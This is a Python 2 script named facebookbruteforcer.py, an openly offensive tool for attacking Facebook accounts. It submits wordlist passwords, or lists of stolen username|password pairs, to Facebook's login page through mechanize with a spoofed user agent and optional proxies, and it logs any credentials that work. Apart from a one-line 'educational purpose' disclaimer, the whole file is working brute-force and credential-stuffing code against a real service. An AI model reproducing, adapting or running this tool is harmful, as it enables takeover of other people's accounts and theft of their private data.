Facebook.py

1. #!/usr/bin/python
2. # This is facebook bruteforcer tools
3. # This was written for educational purpose and pentest only. Use it at your own risk.
4. # Author will not be responsible for any damage !!
5. # Toolname  : facebookbruteforcer.py
6. # Programmer    : Siscovic Zakaria & Silver Wolf
7. # Version   : 3.1
8. # Date      : Tuesday Jun 03 2014 09:13:2014
9.  
10. import re
11. import os
12. import sys
13. import random
14. import warnings
15. import time
16. try:
17.     import mechanize
18. except ImportError:
19.     print "[*] Please install mechanize python module first"
20.     sys.exit(1)
21. except KeyboardInterrupt:
22.     print "\n[*] Exiting program...\n"
23.     sys.exit(1)
24. try:
25.     import cookielib
26. except ImportError:
27.     print "[*] Please install cookielib python module first"
28.     sys.exit(1)
29. except KeyboardInterrupt:
30.     print "\n[*] Exiting program...\n"
31.     sys.exit(1)
32.    
33. warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
34.  
35. # define variable
36. __programmer__  = "Siscovic Zakaria & Silver Wolf"
37. __version__     = "3.1"
38. accfile  = ""
39. checker  = False
40.  
41. verbose     = False
42. useproxy    = False
43. usepassproxy    = False
44. log     = 'fbbruteforcer.log'
45. file        = open(log, "a")
46. success     = 'facebook.com/settings'
47. fblogin     = 'https://login.facebook.com/login.php?login_attempt=1'
48. # some cheating ..
49. ouruseragent    = ['Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0' ]
50. facebook    = '''
51.       __               _                 _    
52.      / _|             | |               | |  
53.     | |_ __ _  ___ ___| |__   ___   ___ | | __
54.     |  _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
55.     | || (_| | (_|  __/ |_) | (_) | (_) |   <
56.     |_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
57.                Brute Force By Siscovic
58.                Modified By SilverWolf <SilverWolf@ceh.vn>
59.                    
60. Programmer : %s
61. Version    : %s''' % (__programmer__, __version__)
62. option          = '''
63. Usage  : %s [options]
64. Option : -u, --username     <username>      |   User for bruteforcing
65.         -w, --wordlist     <filename>      |   Wordlist used for bruteforcing
66.         -f, --full         <filename>      |   Check accounts in file
67.         -v, --verbose              |   Set %s will be verbose
68.         -p, --proxy        <host:port> |   Set http proxy will be use
69.         -k, --usernameproxy    <username>  |   Set username at proxy will be use
70.         -i, --passproxy    <password>  |   Set password at proxy will be use
71.         -l, --log      <filename>  |   Specify output filename (default : fbbruteforcer.log)
72.         -h, --help         <help>          |   Print this help
73.                                                            
74. Example : %s -u Zakaria-Siscovic@hotmail.fr -w wordlist.txt"
75.      
76. P.S : add "&" to run in the background  
77. ''' % (sys.argv[0], sys.argv[0], sys.argv[0])
78. hme         = '''
79. Usage : %s [option]
80.    -h or --help for get help
81.    ''' % sys.argv[0]
82.  
83.  
84. def helpme():
85.     print facebook
86.     print option
87.     file.write(facebook)
88.     file.write(option)
89.     sys.exit(1)
90.    
91. def helpmee():
92.     print facebook
93.     print hme
94.     file.write(facebook)
95.     file.write(hme)
96.     sys.exit(1)
97.    
98. for arg in sys.argv:
99.     try:
100.         if arg.lower() == '-u' or arg.lower() == '--user':
101.                     username = sys.argv[int(sys.argv[1:].index(arg))+2]
102.         elif arg.lower() == '-w' or arg.lower() == '--wordlist':
103.                     wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
104.         elif arg.lower() == '-l' or arg.lower() == '--log':
105.                     log = sys.argv[int(sys.argv[1:].index(arg))+2]
106.         elif arg.lower() == '-p' or arg.lower() == '--proxy':
107.                 useproxy = True
108.                 proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
109.         elif arg.lower() == '-k' or arg.lower() == '--userproxy':
110.             usepassproxy = True
111.             usw = sys.argv[int(sys.argv[1:].index(arg))+2]
112.         elif arg.lower() == '-i' or arg.lower() == '--passproxy':
113.             usepassproxy = True
114.             usp = sys.argv[int(sys.argv[1:].index(arg))+2]
115.         elif arg.lower() == '-v' or arg.lower() == '--verbose':
116.             verbose = True
117.         elif arg.lower() == '-h' or arg.lower() == '--help':
118.             helpme()
119.         elif arg.lower() == '-f' or arg.lower() == '--full':
120.             accfile = sys.argv[int(sys.argv[1:].index(arg))+2]
121.             checker = True
122.         elif len(sys.argv) <= 1:
123.             helpmee()
124.     except IOError:
125.         helpme()
126.     except NameError:
127.         helpme()
128.     except IndexError:
129.         helpme()
130. def accountchecker(fbid,fbpass):
131.     ## Need create browser object again
132.     global br
133.     try:
134.         br = mechanize.Browser()
135.         cj = cookielib.LWPCookieJar()
136.         br.set_cookiejar(cj)
137.         br.set_handle_equiv(True)
138.         br.set_handle_gzip(True)
139.         br.set_handle_redirect(True)
140.         br.set_handle_referer(True)
141.         br.set_handle_robots(False)
142.         br.set_debug_http(False)
143.         br.set_debug_redirects(False)
144.         br.set_debug_redirects(False)
145.         br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
146.         if useproxy:
147.             br.set_proxies({"http": proxy})
148.         if usepassproxy:
149.             br.add_proxy_password(usw, usp)
150.         if verbose:
151.             br.set_debug_http(True)
152.             br.set_debug_redirects(True)
153.             br.set_debug_redirects(True)
154.     except KeyboardInterrupt:
155.         print "\n[*] Exiting program...\n"
156.         file.write("\n[*] Exiting program...\n")
157.         sys.exit(1)
158.     ## Scanning
159.     try:
160.         print "\r[*] Trying %s...                    " % (fbid + " | " + fbpass)
161.         file.write("[*] Trying %s\n" % fbid + fbpass)
162.         sys.stdout.flush()
163.         br.addheaders = [('User-agent', random.choice(ouruseragent))]
164.         opensite = br.open(fblogin)
165.         br.select_form(nr=0)
166.         br.form['email'] = fbid
167.         br.form['pass'] = fbpass
168.         br.submit()
169.         response = br.response().read()
170.         if verbose:
171.             print response
172.         if not success in response:
173.             print "--> Pass: " + (fbid + " | " + fbpass)
174.             file.write("\n--> Pass: " + (fbid + " | " + fbpass))
175.         else:
176.             print "--> Failed"
177.     except KeyboardInterrupt:
178.         print "\n[*] Exiting program...\n"
179.         sys.exit(1)
180.     except mechanize._mechanize.FormNotFoundError:
181.         print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
182.         file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
183.     except mechanize._form.ControlNotFoundError:
184.         print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
185.         file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
186.            
187. def bruteforce(word):
188.     try:
189.         sys.stdout.write("\r[*] Trying %s...                    " % word)
190.         file.write("[*] Trying %s\n" % word)
191.         sys.stdout.flush()
192.         br.addheaders = [('User-agent', random.choice(ouruseragent))]
193.         opensite = br.open(fblogin)
194.         br.select_form(nr=0)
195.         br.form['email'] = username
196.         br.form['pass'] = word
197.         br.submit()
198.         response = br.response().read()
199.         if verbose:
200.             f = open(word + ".txt", 'w')
201.             #print response
202.             f.write(response)
203.         if success in response:
204.             print "\n\n[*] Logging in success..."
205.             print "[*] Username : %s" % (username)
206.             print "[*] Password : %s\n" % (word)
207.             file.write("\n[*] Logging in success...")
208.             file.write("\n[*] Username : %s" % (username))
209.             file.write("\n[*] Password : %s\n\n" % (word))
210.             sys.exit(1)
211.     except KeyboardInterrupt:
212.         print "\n[*] Exiting program...\n"
213.         sys.exit(1)
214.     except mechanize._mechanize.FormNotFoundError:
215.         print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
216.         file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
217.         sys.exit(1)
218.     except mechanize._form.ControlNotFoundError:
219.         print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
220.         file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
221.         sys.exit(1)
222.        
223. def releaser():
224.     global word,checker,accfile
225.     if not checker:    
226.         for word in words:
227.             bruteforce(word.replace("\n",""))
228.     else:
229.         f = open(accfile, 'r')
230.         for line in f:
231.             l1 = line.replace("\n","")
232.             accdic = l1.split("|")
233.             #print accdic[0]
234.             #try:
235.             accountchecker(accdic[0],accdic[1])
236.             #except:
237.             #    print "Split error: " + l1
238.        
239. def main():
240.     global br
241.     global words
242.     try:
243.         br = mechanize.Browser()
244.         cj = cookielib.LWPCookieJar()
245.         br.set_cookiejar(cj)
246.         br.set_handle_equiv(True)
247.         br.set_handle_gzip(True)
248.         br.set_handle_redirect(True)
249.         br.set_handle_referer(True)
250.         br.set_handle_robots(False)
251.         br.set_debug_http(False)
252.         br.set_debug_redirects(False)
253.         br.set_debug_redirects(False)
254.         br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
255.         if useproxy:
256.             br.set_proxies({"http": proxy})
257.         if usepassproxy:
258.             br.add_proxy_password(usw, usp)
259.         if verbose:
260.             br.set_debug_http(True)
261.             br.set_debug_redirects(True)
262.             br.set_debug_redirects(True)
263.     except KeyboardInterrupt:
264.         print "\n[*] Exiting program...\n"
265.         file.write("\n[*] Exiting program...\n")
266.         sys.exit(1)
267.     if not checker:
268.         try:
269.             preventstrokes = open(wordlist, "r")
270.             words          = preventstrokes.readlines()
271.             count          = 0
272.             while count < len(words):
273.                 words[count] = words[count].strip()
274.                 count += 1
275.         except IOError:
276.             print "\n[*] Error: Check your wordlist path\n"
277.             file.write("\n[*] Error: Check your wordlist path\n")
278.             sys.exit(1)
279.         except NameError:
280.             helpme()
281.         except KeyboardInterrupt:
282.             print "\n[*] Exiting program...\n"
283.             file.write("\n[*] Exiting program...\n")
284.             sys.exit(1)
285.         try:
286.             print facebook
287.             print "\n[*] Starting attack at %s" % time.strftime("%X")
288.             print "[*] Account for bruteforcing %s" % (username)
289.             print "[*] Loaded :",len(words),"words"
290.             print "[*] Bruteforcing, please wait..."
291.             file.write(facebook)
292.             file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
293.             file.write("\n[*] Account for bruteforcing %s" % (username))
294.             file.write("\n[*] Loaded : %d words" % int(len(words)))
295.             file.write("\n[*] Bruteforcing, please wait...\n")
296.         except KeyboardInterrupt:
297.             print "\n[*] Exiting program...\n"
298.             sys.exit(1)
299.         try:
300.             releaser()
301.             bruteforce(word)
302.         except NameError:
303.             helpme()
304.     else:
305.         try:
306.             print facebook
307.             print "\n[*] Starting attack at %s" % time.strftime("%X")
308.             print "[*] Bruteforcing, please wait..."
309.             file.write(facebook)
310.             file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
311.             file.write("\n[*] Bruteforcing, please wait...\n")
312.         except KeyboardInterrupt:
313.             print "\n[*] Exiting program...\n"
314.             sys.exit(1)
315.         try:
316.             releaser()
317.             #bruteforce(word)
318.         except NameError:
319.             helpme()
320.  
321. if __name__ == '__main__':
322.     main()